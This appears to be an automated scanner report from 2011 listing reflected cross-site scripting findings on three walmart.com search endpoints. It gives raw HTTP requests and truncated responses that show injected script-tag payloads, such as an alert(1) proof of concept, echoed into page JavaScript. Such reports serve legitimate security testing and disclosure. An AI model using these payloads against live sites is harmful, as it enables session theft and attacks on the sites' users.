1. Cross-site scripting (reflected)
1.1. http://www.walmart.com/search/ [search_query parameter]
1.2. http://www.walmart.com/search/dynamicupdate [request_tabs parameter]
1.3. http://www.walmart.com/search/search-ng.do [search_query parameter]
Severity: High
Confidence: Certain
Host: http://www.walmart.com
Path: /search/

GET /search/?ic=16_0&search
Host: www.walmart.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html;charset=ISO
Date: Thu, 29 Dec 2011 16:18:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: dcenv=ndc; path=/; domain=walmart.com
Set-Cookie: SSLB=0; path=/; domain=.walmart.com
Content-Length: 229382

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR
<html lang="en-US">
<head>
<title> - Walmart</tit
...[SNIP]...
T.page.isPreferredSt
WALMART.page.writeBr
WALMART.cart.wmHost = "//www.walmart.com";
WALMART.page.search_query = "tv cd palyer blueray9662f</script><script
WALMART.page.isTypeA
WALMART.page.isSearc
WALMART.page.isPolar
...[SNIP]...

Severity: High
Confidence: Certain
Host: http://www.walmart.com
Path: /search/dynamicupdate

GET /search/dynamicupdate
Host: www.walmart.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Referer: http://www.walmart.com
Cookie: SSLB=0; SSID=BQAkQBsAAAAAAAA
Content-Length: 10

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Last-Modified: Thu, 29 Dec 2011 15:58:51 GMT
Content-Length: 86
Content-Type: application/json;charset
Cache-Control: no-cache, no-store
Expires: Thu, 29 Dec 2011 15:58:51 GMT
Date: Thu, 29 Dec 2011 15:58:51 GMT
Connection: close
Vary: Accept-Encoding

{"All":"1097","Online":

Severity: High
Confidence: Certain
Host: http://www.walmart.com
Path: /search/search-ng.do

GET /search/search-ng.do
Host: www.walmart.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.walmart.com/
Cookie: SSLB=0; SSID=BQAkQBsAAAAAAAA
Content-Length: 10

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Last-Modified: Thu, 29 Dec 2011 15:59:17 GMT
Content-Length: 289400
Content-Type: text/html;charset=ISO
Cache-Control: no-cache
Expires: Thu, 29 Dec 2011 15:59:17 GMT
Date: Thu, 29 Dec 2011 15:59:17 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR
<html lang="en-US">
<head>
<script>
var t_page_start = new Date().getTime();
(function() {
var b = document.c
...[SNIP]...
mpaignId();
s_omni.prop1="Search";
s_omni.prop2="Search - Partial Match";
s_omni.prop3="Search";
s_omni.prop4="Search";
s_omni.prop5="Search";
s_omni.prop8="Search";
s_omni.prop14="tv cd palyer blueray33829</ScRiPt ><ScRiPt>alert(1)</ScRiPt
s_omni.prop16="757";
s_omni.prop31="Standard Search: Default";
s_omni.prop37="";
s_omni.prop39="Store Not Selected";
s_omni.prop41="Entire Site";
s_omni.prop42="Search";
s_omni.prop45="Standard Sear
...[SNIP]...